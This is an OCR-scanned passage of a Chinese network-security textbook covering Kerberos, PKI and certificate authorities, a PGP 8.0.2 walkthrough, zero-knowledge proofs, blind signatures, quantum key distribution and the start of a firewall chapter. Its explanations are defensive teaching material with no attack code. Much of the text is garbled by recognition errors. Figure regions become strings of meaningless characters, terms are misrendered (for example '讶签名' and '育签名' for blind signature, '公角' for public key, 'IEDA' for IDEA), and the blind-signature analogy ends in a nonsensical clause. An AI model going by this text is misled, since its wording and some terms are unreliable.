求 访问 的 应 用 服务 器 ; @@TGT(Ticket Granting Ticket) ,用 户 向 TGS 证 明 自 己 身 份 的 初始 
票据 , 即 Kros(A,Ks)。 

Kerberos 的 基本 工作 过 程 如 图 7-9 所 示 。 


下 
每 当 用 户 机具 | Wg 
从 录 会 话 。 a 
NS EE 、 
3 人 
> PR) 
OA 


每 当 开始 某 种 类 型 的 服务 
Li 关 族 多 


Wr 


每 当 进行 服 


务 会 话 时 
图 7-9 Kerberos 认证 工作 过 程 
第 1 步 : 用 户 登 录 工 作 站 ,在 主机 上 请 求 服务 器 。 
第 2 步 : AS 在 数据 库 中 验证 用 户 的 访问 权限 ,创建 票据 ,授予 票据 和 会 话 密 钥 。 
果 使 用 来 自用 户口 令 的 密 钥 进行 加 密 。 
第 3 步 : 工作 站 提示 用 户 输入 口令 ,使 用 用 户 的 口令 解密 到 来 的 消息 ,然后 向 TGS 发 
送 票 据 和 包含 用 户 名 、 用 户 网 络 地 址 和 时 间 的 鉴别 码 。 
第 4 步 : TGS 解密 票据 和 鉴别 码 ,然后 为 所 请 求 的 服务 器 创建 票据 。 
第 5 步 : 工作 站 向 服务 器 发 送 票 据 和 鉴别 码 。 
第 6 步 : 服务 器 验证 票据 和 鉴别 码 是 否 匹 配 , 然 
确认 ,服务 器 返回 一 个 鉴别 码 。 
值得 注意 的 是 ,Kerberos 不 但 提供 了 保密 还 提供 了 鉴别 验证 。 因 为 ,只 有 真正 的 A 才 
能 对 KDC 提供 的 对 话 密 钥 进行 解密 , 换 而 言 之 ,.B 知道 的 A 正 是 需要 与 他 通话 的 那个 人 。 
同样 ,A 知道 B 是 真正 与 之 联系 的 人 ,因为 对 B 而 言 KDC 制 成 的 标签 才 有 意义 。 在 
Kerberos 应 用 的 过 程 中 还 增加 了 一 些 增强 安全 性 的 技巧 。Kerberos 中 的 加 密 方 法 是 DES。 
Kerberos 不 是 建立 了 一 个 精密 的 认证 协议 ,而 是 提供 了 一 个 集中 的 认证 服务 器 ,其 功 


后 授予 服务 访问 。 如 果 需 要 进行 相互 
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能 实现 了 应 用 服务 器 与 用 户 间 的 相互 认证 。 现 在 使 用 Kerberos 的 版 本 有 两 个 ,其 中 第 4 版 
还 在 广泛 使 用 ,第 5 版 弥补 了 第 4 版 中 存在 的 某 些 安全 漏洞 ,并 已 作为 Internet 标准 草案 
发 布 。 


7.6 公 钥 基础 设施 PKI 


虽然 越 来 越 多 的 企业 网 和 电子 商务 以 Internet 作为 通信 基础 平台 ,但 都 面临 一 个 问题 ， 
就 是 如 何 建立 相互 之 间 的 信任 关系 以 及 如 何 保 证 信息 的 真实 性 、 完 整 性 、 机 密 性 和 不 可 否认 
性 。PKI 则 是 解决 这 一 系列 问题 的 技术 基础 。 


7.6.1 PKI 概 述 


PKI(Public Key Infrastructure, 公 钥 基 础 设施 ) 就 是 利用 公 钥 理论 和 技术 建立 的 ,为 网 
络 的 数据 和 其 他 资源 提供 信息 安全 服务 的 基础 设施 。 广 义 上 说 ,所 有 提供 公 钥 加 密 和 数字 
签名 服务 的 系统 都 可 以 叫做 PKI 系统 。PKI 的 主要 目的 是 通过 自动 管理 密 钥 和 证 书 ,为 用 
户 建立 起 一 个 安全 的 网 络 运行 环境 ,使 用 户 可 以 在 多 种 应 用 环境 下 方便 地 使 用 加 密 和 数字 
签名 技术 ,从 而 保证 网 络 通信 中 数据 的 机 密 性 、 完 整 性 和 有 效 性 。 一 个 有 效 的 PKI 系统 在 
提供 安全 性 服务 的 同时 ,在 应 用 上 还 应 该 具有 简单 性 和 透明 性 , 即 用 户 在 获得 加 密 和 数字 签 
名 服务 时 ,不 需要 详细 地 了 解 PKI 内 部 实现 原理 和 具体 操作 ,如 PKI 怎样 管理 证 书 和 密 钥 
等 。PKI 的 技术 开始 于 20 世纪 70 年 代 中 期 ,但 开发 基于 PKI 的 产品 的 时 间 不 长 ,目前 被 
广泛 认可 的 PKI 是 以 X. 509 第 三 版 为 基础 的 结构 。PKI 所 带 来 的 保密 性 、 完 整 性 和 不 可 否 
认 性 的 重要 意义 日 益 突出 。 

一 个 标准 的 PKI 体系 结构 如 图 7-10 所 示 。 


3. CA 发 人 机 
gr 布 证 书 证 书 和 CRL 库 
二 a (LDAP 目 录 服 务 ) 


1. 用 户 和 系统 4. 应 用 和 系统 使 用 
申请 证 /ie 证 书 LDAP 


通信 方 使 用 证 书 
(证 书 主体 ) 的 应 用 和 系统 


7-10 PKI 体系 结构 


PKI 的 概念 和 内 容 是 动态 的 、 不 断 发 展 的 ,完整 的 PKI 系统 必须 具有 权威 认证 机 关 
(CA) ,数字 证 书库 、 密 钥 备 份 及 恢复 系统 、 证 书 作 废 系统 等 基本 组 成 部 分 ,构建 PKI 也 将 转 
绕 着 5 大 系统 来 着 手 。 

认证 机 构 (CA): 即 数字 证 书 的 申请 及 签发 机 关 ,CA 必须 具备 权威 性 这 一 特征 , 它 是 
PKI 的 核心 。 

数字 证 书库 : 用 于 存储 已 签发 的 数字 证 书 及 公 钥 ,用 户 可 由 此 获得 所 需 的 其 他 用 户 的 
证 书 及 公 钥 。 
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密 钥 备份 及 恢复 系统 : 如 果 用 户 丢 失 了 用 于 解密 数据 的 密 钥 , 则 数据 将 无 法 被 解密 ,这 
将 造成 合法 数据 丢失 。 为 避免 这 种 情况 ,PKI 提供 备份 与 恢复 密 钥 的 机 制 。 但 须 注意 , 密 钥 
的 备份 与 恢复 必须 由 可 信 的 机 构 来 完成 。 并 且 , 密 钥 备 份 与 恢复 只 能 针对 解密 密 钥 , 签 名 私 
钥 为 确保 其 唯一 性 而 不 能 够 作为 备份 。 

证 书 作 废 系统 : 证 书 作废 处 理 系统 是 PKI 的 一 个 必 备 的 组 件 。 与 日 常生 活 中 的 各 种 身 
份 证 件 一 样 , 证 书 有 效 期 以 内 也 可 能 需要 作废 ,原因 可 能 是 密 钥 介质 丢失 或 用 户 身份 变更 
等 。 为 实现 这 一 点 ,PKI 必须 提供 作废 证 书 的 一 系列 机 制 。 

应 用 接口 (APD : PKI 的 价值 在 于 使 用 户 能 够 方便 地 使 用 加 密 、 数 字 签名 等 安全 服务 ， 
因此 一 个 完整 的 PKI 必须 提供 良好 的 应 用 接口 系统 ,使 得 各 种 各 样 的 应 用 能 够 以 安全 、 一 
致 .可 信 的 方式 与 PKI 交互 ,确保 安全 网 络 环境 的 完整 性 和 易 用 性 。 客 户 端 软件 的 安装 就 
可 使 客户 方便 地 使 用 PKI 系 统 。 

对 于 构建 密码 服务 系统 的 核心 内 容 是 如 何 实现 密 钥 管 理 , 公 钥 体 制 涉及 一 对 密 钥 ( 即 私 
钥 和 公 钥 ) , 私 钥 只 由 用 户 独立 掌握 ,无 须 在 网 上 传输 ,而 公 钥 则 是 公开 的 ,需要 在 网 上 传送 ， 
故 公 钥 体制 的 密 钥 管理 主要 是 针对 公 钥 的 管理 问题 ,目前 较 好 的 解决 方案 是 数字 证 书 机 制 。 


7.6.2 PKI 功能 


PKI 具 有 产生 、 验 证 和 分 发 密 钥 、 答 发 和 验证 ,获取 证 书 、 验 证 证 书 \ 保 存 证 书 、 本 地 保存 
的 证 书 的 获取 .证书 的 撤销 、 密 钥 的 恢复 .证书 撤 销 列表 (CRL) 的 获取 、 密 钥 的 更 新 .审计 以 
及 存档 等 功能 。 这 些 功 能 大 部 分 是 由 PKI 的 核心 组 成 部 分 CA 完成 的 。 其 中 CA 主要 完成 
的 功能 有 : 证 书 颁 发 .证 书 更 新 .证 书 和 证 书 撤销 列表 的 公布 .证 书 状 态 的 在 线 查询 .证书 认 
证 和 制定 政策 等 。 

1. 证 书 认 证 中 心 

CA 的 建设 目标 是 建设 电子 商务 .电子 政务 等 交易 的 可 信 、 安 全 平台 ,以 实现 网 上 交易 
身份 确认 、 密 钥 管 理 等 ,保证 网 络 安全 运行 。 
CA 的 设计 完全 遵循 国际 标准 ,如 PKIX、SSL、 
PKCS、CDSA、X. 509、LDAP 等 , 既 符 合 国际 
标准 ,又 具有 较 好 的 开放 性 。 其 体系 结构 如 
图 7-11 所 示 。 

CA 体系 结构 中 的 主要 组 成 部 分 如 下 。 


证 书 /CRL 库 


CA 


(1) CA 中 心 。CA 中 心 只 具有 证 书 及 其 LLDAP gf mtemet 受理 点 
相关 业务 的 管理 功能 。CA 中 心 在 证 书 的 产生 在 线 证 书 离线 注册 信息 
过 程 中 将 部 分 工作 转 给 了 其 他 实体 ,以 双 证 书 证 书 申请 者 


产生 的 过 程 为 例 : 用 户 在 本 地 生成 签名 密 钥 
对 ,在 KM 中 心 生 成 加 密 密 钥 对 , 密 钥 对 的 产 
生 都 不 经 过 CA 中 心 。 而 CA 只 获取 公 钥 及 用 户 信息 ,加 盖 CA 的 私 童 即 数 字 签 名 。CA 中 
心 还 负责 对 下 级 RA 的 管理 ,RA 机 构 的 注册 ,运营 都 要 通过 CA 中 心 的 授权 。 

(2) KM 中 心 。 密 钥 管理 KM 中 心 负责 密 钥 的 管理 ,向 CA 中 心 提 供 密 钥 生成 、 密 钥 托 
管 等 服务 。KM 中 心 纳入 国家 商用 密码 的 统一 管理 ,同时 还 接受 国家 密码 管理 委员 会 授权 
的 密 钥 管理 中 心 的 管理 。 


图 7-11 CA 体系 结构 
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(3) RA 中 心 。RA (Registration Authority) 中 心 是 证 书 的 申请 、 审 核 和 受理 中 心 , 是 
CA 中 心 的 下 级 机 构 ,负责 证 书 业 务 的 受理 和 审核 .eKey 的 发 放 。 证 书 申请 注册 机 构 CA 为 
层次 结构 ,RA 为 注册 总 中 心 ,负责 证 书 申请 注册 汇总 。 

2. CA 的 主要 职责 

下 面 对 CA 的 主要 功能 进行 说 明 。 

1) 证 书 颁 发 

申请 者 在 CA 的 注册 机 构 进 行 注 册 , 申 请 证 书 。CA 对 申请 者 进行 审核 ,审核 通过 则 生 
成 证 书 , 颁 发 证 书 给 申请 者 。 证 书 的 申请 可 采取 在 线 申 请 和 亲自 到 注册 机 构 申 请 两 种 方式 。 
证 书 的 颁发 也 可 采取 两 种 方式 : 一 种 是 在 线 直接 从 CA 下 载 ; 一 种 是 CA 将 证 书 制作 成 介 
质 如 IC 卡 后 ,由 申请 者 带 走 。 

2) 证 书 更 新 

当 证 书 持 有 者 的 证 书 过 期 、 被 窃取 或 丢失 时 ,可 通过 更 新 证 书 的 方式 ,使 其 使 用 新 的 证 
书 ,继续 参与 网 上 认证 。 证 书 的 更 新 包括 证 书 的 更 换 和 证 书 的 延期 两 种 情况 。 证 书 的 更 换 
实际 上 是 重新 颁发 证 书 ,因此 证 书 更 换 的 过 程 和 证 书 的 申请 流程 基本 一 致 。 证 书 的 延期 只 
是 将 证 书 有 效 期 延长 ,其 签名 和 加 密 信息 的 公 钥 / 私 钥 没 有 改变 。 

3) 证 书 撤销 

证 书 持 有 者 可 以 向 CA 申请 撤销 证 书 。CA 通过 认证 核实 可 执行 撤销 证 书 职 责 , 通 知 
有 关 组 织 和 个 人 ,并 写 人 CRL。 

3. 证 书 和 CRL 的 公布 

CA 通过 LDAP 服务 器 维护 用 户 证 书 和 CRL。 它 向 用 户 提供 目录 浏览 服务 ,负责 将 新 
签发 的 证 书 或 废止 的 证 书 加 入 到 LDAP 服务 器 上 ,这 样 用 户 通过 访问 LDAP 服务 器 就 能 够 
得 到 其 他 人 的 数字 证 书 或 能 访问 CRL。 

4. 证 书 状态 的 在 线 查询 

通常 CRL 的 发 布 为 一 日 一 次 ,CRL 的 状态 同 当 前 状态 有 一 定 的 滞后 。 证 书 状态 的 在 
线 查 询 通 过 向 OCSP 服务 器 发 送 OCSP 查询 包 实 现 , 包 中 含有 待 验证 证 书 的 序列 号 、 验 证 时 
间 蕉 ,OCSP 服务 器 返回 证 书 的 当前 状态 并 对 返回 结果 加 以 签名 。 在 线 证 书 状态 查询 比 
CRL 更 具有 时 效 性 。 

5. 证 书 认证 

CA 对 证 书 进行 有 效 性 和 真实 性 的 认证 ,在 实际 操作 中 ,如 果 一 个 CA 管理 用 户 太 多 ， 
则 很 难得 到 所 有 用 户 的 依赖 并 接受 它 所 发 行 的 所 有 用 户 的 公 角 证书, 而 且 一 个 CA 也 很 难 
对 大 量 的 用 户 有 足够 .全 面 的 了 解 ,为 此 需要 采用 一 种 多 CA 分 层 结构 的 系统 。 在 多 个 CA 
的 系统 中 ,由 特定 CA 发 放 证 书 的 所 有 用 户 组 成 一 个 域 , 同 一 个 域 中 的 用 户 可 以 直接 进行 证 
书 交换 和 认证 ,而 不 同 域 中 用 户 的 公 钥 安全 认证 和 递送 需要 通过 建立 一 个 可 依赖 的 证 书 链 
或 证 书 通路 实现 。 跨 域 证 书 的 认证 也 可 通过 交叉 认证 来 实现 ,这 会 大 大 缩短 信任 关系 的 路 
径 , 提 高 效率 。 

6. 制定 政策 

普通 用 户 信任 一 个 CA 除了 它 的 技术 因素 之 外 , 另 一 个 极 重要 的 因素 就 是 CA 的 政策 。 
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CA 的 政策 指 的 是 CA 必须 对 信任 它 的 各 方 负责 , 它 的 责任 大 部 分 体现 在 政策 的 制定 和 实 
施 上 。CA 的 政策 越 公 开 越 好 ,信息 发 布 越 及 时 越 好 。CA 的 政策 包含 : DCA 私 钥 的 保护 ; 
回 证 书 申请 时 密 钥 对 的 产生 方式 ; 加 对 用 户 私 钥 的 保护 ; @CRL 的 更 新 频率 ; @ 通 知 服 
务 ; @ 保 护 CA 服务 器 ; @ 审 计 与 日 志 检查 。 


7.7 加 密 软件 PGP 


7.7.1 PGP 简介 


PGP(Pretty Good Privacy) 加 密 技术 是 一 个 基于 RSA 公 钥 加 密 体 系 的 邮件 加 密 软件 ， 
是 一 种 不 对 称 的 文件 加 密 技术 。 

由 于 RSA 算法 计算 量 极 大 ,在 速度 上 不 适合 加 密 大 量 数据 ,所 以 PGP 实际 上 用 来 加 密 
的 不 是 RSA 本 身 ,而 是 采用 传统 加 密 算法 IDEA,IDEA 加 解密 的 速度 比 RSA 快 得 多 。 
PGP 随机 生成 一 个 密 钥 ,用 IDEA 算法 对 明文 加 密 , 然 后 用 RSA 算法 对 密 钥 加 密 。 收 件 人 
同样 是 用 RSA 解 出 随机 密 钥 ,再 用 IEDA 解 出 原文 。 这 样 的 链 式 加 密 既 有 RSA 算法 的 保 
密 性 (Privacy) 和 认证 性 (Authentication) ,又 保持 了 IDEA 算法 速度 快 的 优势 。 

PGP 加 密 技术 的 创始 人 是 美国 的 Phil Zimmermann。 他 创造 性 地 把 RSA 公 钥 体系 和 
传统 加 密 体系 结合 起 来 ,在 数字 签名 和 密 钥 认证 管理 机 制 上 也 有 巧妙 的 设计 ,并 且 源 代码 的 
全 免费 性 使 PGP 成 为 目前 几乎 最 流行 的 公 钥 加 密 软件 包 。 

公开 密 钥 的 安全 性 问题 是 PGP 安全 的 核心 , 它 的 提出 就 是 为 了 解决 传统 加 密 机 制 中 的 
密 钥 分 配 难 于 保密 的 缺点 。 为 了 防止 密 钥 被 修改 ,PGP 采取 了 前 面 介绍 过 的 “证 明 权 威 ”， 
每 个 由 其 签名 的 公用 密 钥 都 被 视 为 真 的 。 私 有 密 钥 相对 于 公开 密 钥 不 存在 被 贷 改 的 问题 ， 
但 是 存在 泄漏 的 问题 。 对 此 ,PGP 的 办 法 是 让 用 户 为 随机 生成 的 RSA 私有 密 钥 指定 一 个 
口令 ,只 有 通过 给 出 口令 才能 将 私有 密 钥 释放 出 来 使 用 。 

PGP 在 安全 性 问题 上 的 考虑 是 很 全 面 的 ,考虑 了 各 个 环节 。 它 的 程序 对 随机 数 的 产生 
是 很 严密 谨慎 的 ,关键 的 随机 数 , 如 RSA 密 钥 的 产生 是 从 用 户 看 键盘 的 时 间 间 隔 上 取得 随 
机 数 种 子 的 。 磁 盘 上 的 Randseed bin 文件 是 采用 和 邮件 同样 强度 加 密 的 。 这 样 就 有 效 地 
防止 了 从 Randseed bin 文件 中 分 析出 实际 加 密 密 钥 的 规律 。 


7.7.2 ”PGP 加 密 软 件 


下 面 使 用 的 PGP 加 密 软件 是 8. 0. 2 版 本 ,使 用 PGP8. 0. 2i 可 以 简捷 高 效 地 实现 邮件 
或 者 文件 的 加 密 、 数 字 签 名 。 

首先 进行 软件 的 安装 。 在 安装 过 程 中 ,使 用 默认 的 安装 设置 ,不 对 其 进行 单独 设置 。 如 
果 是 第 一 次 安装 ,注意 选择 No,I am a New User。 当 安装 到 需要 选择 安装 的 组 件 时 ,一 般 
也 采用 默认 选项 。 其 中 PGPdisk Volume Security 的 功能 是 提供 磁盘 文件 系统 的 安全 性 ， 
PGPmail for Microsoft Outlook/Outlook Express 提供 邮件 的 加 密 功 能 。 安 装 完成 后 ,系统 
提示 重启 计算 机 ,这 样 PGP 软件 就 安装 成 功 了 。 

1. 使 用 PGP 产生 密 钥 

因为 在 用 户 类 型 对 话 框 中 选择 了 “新 用 户 ”, 在 计算 机 启动 以 后 ,会 自动 提示 建立 PGP 密 
钥 , 单 击 “ 下 一 步 ” 按 钮 ,在 用 户 信 息 对 话 框 中 输入 相应 的 姓名 和 电子 邮件 地 址 ,如 图 7-12 所 示 。 
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Name and Email Assignment 
Every key pai must have a name associated wihit. The name and emai address let 
your conespondents know that the public key they are using belongs to you. 


Eu name: 


By associaling an emal addhess with your key pai， A ello on race re 
comespondents in selecting the comect publc key When communicating Wih you 


Emal addhess: 


图 7-12 用 户 信息 


单 击 “下 一 步 ? 按 钮 ,出现 如 图 7-13 所 示 对 话 框 , 按 提示 信息 ,在 PGP 密码 输入 框 中 输 
入 8 位 以 上 的 密码 并 确认 。 在 Passphrase 中 输入 密码 ,在 Confirmation 中 再 次 输入 密码 ， 
如 图 7-13 所 示 。 


Passphrase Assignment 
Your private key wil be prolected by a passphrase. Itis mportant thal you keep this 
passphrase secret and do not write R down. 


Your passphrase should be at least 8 characters long and should contain 
norralphabetic characters. 


Hide Typing 


“上 ~ 步 @]F 二 步 WD > 


图 7-13 输入 密码 
单 击 “ 下 一 步 " 按 钮 后 ,PGP 软件 会 自动 产生 PGP 密 钥 ,生成 的 密 钥 如 图 7-14 所 示 。 


和 Trust Size Description 
已 能 raayileng Ctianshanjiaor... @ S252 2043/1024 DN/ISS key pair 
日 回 yanyilang Ctisnshanjiaoria 9] Vser Dh 


yanyilane ctianshanjiae DSS expor table signaturd| 


1 user ID(s) selected 


图 7-14 密 钥 列表 
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2. 使 用 PGP 加 密 文件 


使 用 PGP 可 以 加 密 本 地 文件 , 右 击 要 加 密 的 文件 ,选择 PGP 菜单 项 中 的 Encrypt。 系 
统 自动 出 现 对 话 框 ,让 用 户 选 择 要 使 用 的 加 密 密 钥 , 选 中 一 个 密 钥 , 单 击 OK 按钮 ,完成 加 
密 , 如 图 7-15 所 示 。 


2 PEPshell - Key Selection Dialog 


Fdyinyilane <tianshanjiaoxiaBsina cony 


厂 Text outpat 

厂 Input Is Text 

Wipe Original 

厂 coaventienal Eneryption 
厂 Self Decrypting Mrchive 


图 7-15 选择 密 角 


完成 之 后 ,目标 文件 已 被 加 密 ,在 当前 目录 下 自动 产生 一 个 新 的 文件 ,如 图 7-16 所 示 。 


打开 加 密 后 的 文件 时 ,程序 自动 要 求 输入 密码 ,输入 建立 该 密 钥 时 的 密码 ,就 可 打开 此 
加 密 文件 ,如 图 7-17 所 示 。 


PePaail - Enter Passphrase 


Message was enctypted lo the folowing public key{s} 
|ranyilang 《tianshanjiaoxia8sina con》 (DH/2048) 


Enter passphtase for your private key : 


回 Hide Typing 


图 7-16 原文 件 和 加 密 后 的 文件 图 7-17 输入 密码 


3. 使 用 PGP 加 密 邮件 

PGP 的 主要 功能 是 加 密 邮 件 , 安 装 完毕 后 ,PGP 自动 和 Outlook 或 者 Outlook Express 
关联 。 和 Outlook Express 关联 如 图 7-18 所 示 。 

利用 Outlook 建立 邮件 ,可 以 选择 利用 PGP 进行 加 密 和 签名 ,如 图 7-19 所 示 。 


当 对 方 收 到 邮件 以 后 ,邮件 是 乱码 ,只 有 得 到 密 钥 的 用 户 才 可 以 正常 查看 邮件 。 可 以 通 
过 PGP 导出 和 导入 密 钥 实现 密 钥 的 交换 。 
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文件 中) 编辑) 查看 9w) 括 入 GD 格式 0) 工 G ” 雇 | 
志 ~ 


iw) 热 展 
/a 

和 拼写 柱 查 
0 ps 
有 ttn 


国 sim Wessace S/MIME) 


[a Inerypt Nessage G/N 


EE 


Ff sim Nossace pe 


出 ra 


自 定义 C) 


图 7-19 加 密 邮 件 


7.8 ”新 一 代 的 加 密 技术 


新 一 代 的 加 密 技 术 主要 包括 : 零 知 识 证 明 技术 、 盲 签名、 比特 承诺 、 遗 忘 传递 .数字 化 现 
金 , 量 子 密码 技术 和 混沌 密码 等 。 


7.8.1 零 知 识 证 明 技 术 


零 知 识 证 明 (zero-knowledge proof) 技 术 ,是 由 Goldwasser 等 人 在 20 世纪 80 年 代 初 提 
出 的 。 它 指 的 是 证 明 者 能 够 在 不 向 验证 者 提供 任何 有 用 的 信息 的 情况 下 ,使 验证 者 相信 某 
个 论断 是 正确 的 。 零 知识 证 明 实 质 上 是 一 种 涉及 两 方 或 更 多 方 的 协议 , 即 两 方 或 更 多 方 完 
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成 一 项 任务 所 需 采取 的 一 系列 步骤 。 证 明 者 向 验证 者 证 明 并 使 其 相信 自己 知道 或 拥有 某 一 
消息 ,但 证 明 过 程 不 能 向 验证 者 泄漏 任何 关于 被 证 明 消息 的 信息 。 在 Goldwasser 等 人 提出 
的 零 知 识 证 明 中 ,证明 者 和 验证 者 之 间 必 须 进行 交互 ,这 样 的 零 知 识 证 明 被 称 为 “交互 零 知 
识 证 明 ”。20 世纪 80 年 代 末 ,Blum 等 人 进一步 提出 了 “ 非 交 互 零 知识 证 明 ” 的 概念 ,用 一 个 
短 随机 串 代 替 交 互 过 程 并 实现 了 零 知 识 证 明 。 非 交互 零 知 识 证 明 的 一 个 重要 应 用 场合 是 需 
要 执行 大 量 密码 协议 的 大 型 网 络 。 

一 个 简单 的 例子 是 : A 要 向 B 证 明 自 己 拥有 某 个 房间 的 钥匙 ,假设 该 房间 只 能 用 钥匙 
打开 锁 , 而 其 他 任何 方法 都 打 不 开 。 这 时 有 两 个 方法 : A 把 钥匙 出 示 给 B,B 用 这 把 钥匙 
打开 该 房间 的 锁 , 从 而 证 明 A 拥有 该 房间 的 正确 的 钥匙 ; DB 确定 该 房间 内 有 某 一 物体 ,A 
用 自己 拥有 的 钥匙 打开 该 房间 的 门 ,然后 把 物体 拿 出 来 出 示 给 B, 从 而 证 明 自己 确实 拥有 该 
房间 的 钥匙 。 后 面 这 个 方法 就 属于 零 知识 证 明 。 该 方法 的 好 处 在 于 在 整个 证 明 的 过 程 中 ， 
B 始终 不 能 看 到 钥匙 的 样子 ,从 而 避免 了 钥匙 的 泄漏 。 


7.8.2 盲 签名 技术 


讶 签名 技术 产生 于 1982 年 。 育 签名 因为 具有 盲 性 这 一 特点 ,可 以 有 效 保护 所 签署 消息 
的 具体 内 容 , 所 以 在 电子 商务 和 电子 选举 等 领域 有 着 广泛 的 应 用 。 

讶 签名 允许 消息 拥有 者 先 将 消息 讶 化 ,而 后 对 讶 化 的 消息 进行 签名 ,最 后 消息 拥有 者 对 
签字 除去 盲 因子 ,得 到 签名 者 关于 原 消 息 的 签名 。 盲 签名 就 是 接收 者 在 不 让 签名 者 获取 所 
签署 消息 具体 内 容 的 情况 下 所 采取 的 一 种 特殊 的 数字 签名 技术 , 它 除 了 满足 一 般 的 数字 签 
名 条 件 外 ,还 必须 满足 以 下 的 两 条 性 质 。 

(1) 签名 者 对 其 所 签署 的 消息 是 不 可 见 的 , 即 签名 者 不 知道 他 所 签署 消息 的 具体 内 容 。 

(2) 签名 消息 不 可 追踪 , 即 当 签 名 消息 被 公布 后 ,签名 者 无 法 知道 这 是 他 哪 次 签署 的 。 

可 以 用 一 个 直观 的 例子 来 说 明 盲 签名 : 育 签 名 的 过 程 就 是 将 隐蔽 的 文件 放 进 信封 里 ， 
而 除去 盲 因子 的 过 程 就 是 打开 这 个 信封 , 当 文 件 在 一 个 信封 中 时 ,任何 人 不 能 读 它 。 对 文件 
签名 就 是 通过 在 信封 里 放 一 张 复写 纸 ,签名 者 在 信封 上 签名 时 ,他 的 签名 便 透 过 复写 纸 签到 
交 作 笑 。 

一 般 来 说 ,一 个 好 的 盲 签名 应 该 具有 以 下 的 性 质 。 

(1) 不 可 伪造 性 。 除 了 签名 者 本 人 外 ,任何 人 都 不 能 以 他 的 名 义 生 成 有 效 的 盲 签名。 
这 是 一 条 最 基本 的 性 质 。 

(2) 不 可 抵赖 性 。 签 名 者 一 旦 签署 了 某 个 消息 ,就 无 法 否认 自己 对 消息 的 签名 。 

(3) 盲 性 。 签 名 者 虽然 对 某 个 消息 进行 了 签名 ,但 他 不 可 能 得 到 消息 的 具体 内 容 。 

(4) 不 可 跟踪 性 。 一 旦 消息 的 签名 公开 后 ,签名 者 不 能 确定 自己 是 在 何 时 签署 的 这 条 
消息 。 

满足 上 面 几 条 性 质 的 盲 签 名 ,被 认为 是 安全 的 。 这 4 条 性 质 既是 设计 育 签名 所 应 遵循 
的 标准 ,又 是 判断 讶 签名 性 能 优 劣 的 根据 。 

另外 ,方案 的 可 操作 性 和 实现 的 效率 也 是 设计 讶 签名 时 必须 考虑 的 重要 因素 。 一 个 育 
签名 的 可 操作 性 和 实现 速度 取决 于 以 下 几 个 方面 : 密 钥 的 长 度 、 讶 签名 的 长 度 和 讶 签名 的 
算法 及 验证 算法 。 
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7.8.3 量子 密码 技术 


量子 密码 技术 是 密码 术 与 量子 力学 结合 的 产物 。 不 同 于 以 数学 为 基础 的 经 典 密码 体 
制 ,其 安全 性 由 量子 力学 基本 原理 保证 。 量 子 力学 的 一 些 基 本 性 质 包 括 量子 态 全 加 原理 、 测 
不 准 原理 .量子 不 可 克隆 定理 以 及 量子 纠缠 等 。 

量子 密码 之 所 以 具有 无 条 件 的 安全 性 ,关键 的 一 点 是 因为 量子 比特 不 同 于 经 典 比特 ,不 
能 被 随意 复制 ,一 旦 被 复制 , 则 接收 方 能 立即 发 现 , 因 此 保证 了 信息 的 安全 性 。 

目前 量子 密码 中 研究 最 成 熟 的 是 量子 密 钥 分 发 , 继 1984 年 Bennett 等 提出 第 一 个 
BB84 协议 以 来 ,人 们 基于 不 同 的 物理 原理 和 物理 实现 陆续 提出 了 许多 密 钥 分 发 协议 。 量 子 
密 钥 分 发 的 安全 性 主要 体现 为 窃听 的 可 检测 性 。 根 据 量子 力学 性 质 , 窃 听 者 要 想 获 得 信息 
必定 会 扰动 量子 态 , 而 合法 通信 者 可 以 检测 到 这 种 扰动 。 即 用 户 虽然 不 能 阻止 窃听 ,但 可 以 
判定 是 否 存在 窃听 。 如 果 存 在 则 放弃 传输 结果 ,否则 通信 者 将 得 到 一 串 共享 的 原始 密 钥 , 然 
后 通过 数据 筛选 保密 增强 等 处 理 就 可 以 获得 安全 的 密 钥 。 在 量子 认证 系统 方面 涉及 的 还 
有 量子 认证 码 和 量子 签名 ,在 量子 安全 协议 方面 主要 有 量子 秘密 共享 .量子 比特 承诺 、 量 子 
不 经 意 传输 .量子 多 方 计算 等 。 
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本 章 学 习 要 求 : 

。 掌握 防火 墙 的 概念 和 分 类 。 

。 了解 新 一 代 防 火 墙 的 主要 技术 。 

。 掌握 防火 墙 防御 体系 结构 。 

。 热 悉 防火 墙 部 署 过 程 和 典型 部 署 模式 。 
。 熟悉 通用 入 侵 检测 模型 和 入 侵 检测 系统 的 功能 。 
。 掌握 入 侵 检测 系统 的 分 类 。 

。 了 解 入 侵 检测 的 过 程 。 

。 了 解 入 侵 检测 的 方法 。 

。 熟悉 入 侵 防 御 系 统 的 工作 原理 。 

。 了 解 常见 的 防火 墙 产品 和 入 侵 检测 产品 。 


8.1 防火 墙 基础 


Internet 的 发 展 给 政府 机 构 、 企 事业 单位 带 来 了 革命 性 的 改革 和 开放 。 他 们 正 努 力 通 
过 利用 Internet 来 提高 办 事 效 率 和 市 场 反应 速度 ,以 便 更 具 竞 争 力 。 通 过 Internet, 企 业 可 
以 从 异地 取 回 重要 数据 ,同时 又 要 面 对 Internet 开放 带 来 的 数据 安全 的 新 挑战 和 新 危险 : 
即 客户 .销售 商 、 移 动用 户 . 异 地 员工 和 内 部 员工 的 安全 访问 ,以 及 保护 企业 的 机 密 信息 不 受 
黑客 和 工业 间谍 的 入 侵 。 因 此 企业 必须 加 筑 安 全 的 “战壕 ”, 而 这 个 “战壕 ?就 是 防火 墙 
(Firewall) 。 防 火 墙 技术 是 建立 在 现代 通信 网 络 技术 和 信息 安全 技术 基础 上 的 应 用 性 安全 
技术 , 越 来 越 多 地 应 用 于 专用 网 络 与 公用 网 络 的 互联 环境 之 中 ,尤其 以 接 入 Internet 为 
最 甚 。 

防火 墙 成 为 近年 来 新 兴 的 保护 计算 机 网 络 安全 的 技术 性 措施 。 它 是 一 种 隔离 控制 技 
术 ,在 不 同 网 域 之 间 设 置 屏障 ,阻止 对 信息 资源 的 非法 访问 ,对 于 来 自 Internet 的 访问 ,采取 
有 选择 的 接受 方式 , 它 可 以 允许 或 禁止 一 类 具体 的 IP 地 址 访问 ,可 以 接受 或 拒绝 TCP/IP 
上 的 某 一 类 应 用 ,也 可 以 使 用 防火 墙 阻止 重要 信息 从 企业 的 网 络 上 被 非法 输出 。 


8.1.1 防火 墙 的 概念 


1. 防火 墙 的 原理 

防火 墙 的 本 义 是 指 古 代 构 筑 和 使 用 木 制 结构 房屋 的 时 候 , 为 防止 火灾 的 发 生 和 蔓延 ,人 
们 将 坚固 的 石 块 堆砌 在 房屋 周围 作为 屏障 ,这 种 防御 构筑 物 就 被 称 为 防火墙。 然而 ,多 数 
